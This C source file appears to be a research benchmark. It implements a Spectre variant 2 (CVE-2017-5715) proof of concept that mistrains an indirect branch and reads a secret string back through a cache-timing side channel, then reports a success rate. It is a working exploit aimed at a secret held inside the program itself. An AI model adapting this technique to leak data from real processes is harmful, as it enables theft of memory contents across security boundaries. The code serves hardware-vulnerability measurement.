/* spectre.c - CVE-2017-5715 user-to-user sucess rate measurement * * Borrows code from * - https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6 * * Copyright (c) 2022 Samuel AUBERTIN * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include "octopus.h" #define GAP 1024 char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion."; uint64_t* target; // pointer to indirect call target unsigned int cache_hit_threshold, array1_size = 16; uint8_t unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 }; uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */ uint8_t channel[256 * GAP]; // side channel to extract secret phrase // mistrained target of indirect call int gadget(char* addr) { return channel[*addr * GAP]; // speculative loads fetch data into the cache } // safe target of indirect call int safe_target(char* addr) { return 42; } // function that makes indirect call // note that addr will be passed to gadget via %rdi int victim_function(char* addr, int input) { #pragma GCC diagnostic ignored "-Wuninitialized" unsigned int result, junk = junk; // set up branch history buffer (bhb) by performing >29 taken branches // see https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html // for details about how the branch prediction mechanism works // junk and input used to guarantee the loop is actually run for (int i = 1; i <= 100; i++) { input += i; junk += input & i; } // call *target __asm volatile( "mov %%rax, %2\n" "callq *%1\n" "mov %0, %%eax\n" : "=r" (result) : "r" (*target), "r" (addr) : "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11"); return result & junk; } static inline void leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_threshold) { static int results[256]; int tries, i, j, mix_i; unsigned int junk = 0; volatile uint8_t* addr; char dummy = '@'; #ifdef NOCLFLUSH int junk2 = 0; int l; (void)junk2; #endif for (i = 0; i < 256; i++) { results[i] = 0; channel[i * GAP] = 1; } for (tries = 999; tries > 0; tries--) { *target = (uint64_t)&gadget; #ifndef NOMFENCE _mm_mfence(); #endif for (j = 50; j > 0; j--) { junk ^= victim_function(&dummy, 0); } #ifndef NOMFENCE _mm_mfence(); #endif #ifndef NOCLFLUSH for (i = 0; i < 256; i++) { _mm_clflush(&channel[i * GAP]); } #else for (j = 0; j < 16; j++) { for (i = 0; i < 256; i++) { flush_memory_sse(&channel[i * GAP]); } } #endif #ifndef NOMFENCE _mm_mfence(); #endif // change to safe target *target = (uint64_t)&safe_target; #ifndef NOMFENCE _mm_mfence(); #endif // flush target to prolong misprediction interval #ifndef NOCLFLUSH _mm_clflush((void*) target); #else flush_memory_sse((void*) target); #endif #ifndef NOMFENCE _mm_mfence(); #endif // call victim junk ^= victim_function(target_addr, 0); #ifndef NOMFENCE _mm_mfence(); #endif // now, the value of *addr_to_read should be cached even though // the logical execution path never calls gadget() /* Time reads. Order is lightly mixed up to prevent stride prediction */ for (i = 0; i < 256; i++) { mix_i = ((i * 167) + 13) & 255; addr = & channel[mix_i * GAP]; if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) { results[mix_i]++; /* cache hit - add +1 to score for this value */ } } /* Locate highest results in j */ j = -1; for (i = 0; i < 256; i++) { if (j < 0 || results[i] >= results[j]) { j = i; } } if (results[j] >= 3) { break; } } results[0] ^= junk; /* use junk so code above won’t get optimized out*/ value[0] = (uint8_t) j; score[0] = results[j]; } int main(int argc, char** argv) { int o, score[2], len = (int)strlen(secret), json = 0, successes = 0; uint8_t value[2]; char* addr = secret; while ((o = getopt(argc, argv, "t:j")) != EOF) { switch (o) { case 't': cache_hit_threshold = atoi(optarg); break; case 'j': json++; break; default: usage: fprintf(stderr, "usage: %s [-j] " "[-t threshold]\n" "\t-j\t\tJSON output\n" "\t-t INT\t\tfixed threshold\n", argv[0]); return 1; } } if (argc != optind) { goto usage; } target = (uint64_t*)malloc(sizeof(uint64_t)); fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5715:\n[?] ", argv[0] + 2, len); calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold); #ifdef NOCLFLUSH for (i = 0; i < (int)sizeof(cache_flush_array); i++) { cache_flush_array[i] = 1; } #endif while (--len >= 0) { leak(addr++, value, score, cache_hit_threshold); if(score[0] == 3 && value[0] > 31 && value[0] < 127) { successes++; fprintf(stderr, "\033[32m%c\033[0m", (value[0])); } else { fprintf(stderr, "\033[31m?\033[0m"); } } fprintf(stderr, "\n"); if (json) { printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2); #ifndef NORDTSCP printf("\"rdtscp\": true, "); #else printf("\"rdtscp\": false, "); #endif #ifndef NOMFENCE printf("\"mfence\": true, "); #else printf("\"mfence\": false, "); #endif #ifndef NOCLFLUSH printf("\"clflush\": true "); #else printf("\"clflush\": false "); #endif printf("}, "); printf("\"threshold\": %d, ", cache_hit_threshold); printf("\"success\": %.0f } }", 100 * successes / (float)strlen(secret)); } fprintf(stderr, "[+] %-27s\t",argv[0] + 2); #ifndef NORDTSCP fprintf(stderr, "RDTSCP "); #else fprintf(stderr, "RDTSC "); #endif #ifndef NOMFENCE fprintf(stderr, "MFENCE "); #endif #ifndef NOCLFLUSH fprintf(stderr, "CLFLUSH "); #endif fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", cache_hit_threshold, 100 * successes / (float)strlen(secret)); free(target); return 0; }